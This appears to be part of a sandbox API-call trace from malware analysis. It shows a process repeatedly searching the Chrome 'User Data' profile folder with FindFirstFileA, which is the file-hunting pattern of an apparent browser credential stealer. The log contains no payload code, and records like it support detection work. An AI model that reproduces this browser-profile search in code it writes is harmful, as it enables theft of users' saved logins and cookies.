lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.640] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.640] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.640] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.641] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.641] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.641] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.641] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.641] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.641] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.641] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.642] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.642] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.642] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.642] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.642] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.642] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.642] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.642] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.642] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.642] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.642] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.642] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.642] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.643] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.643] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.644] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.644] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 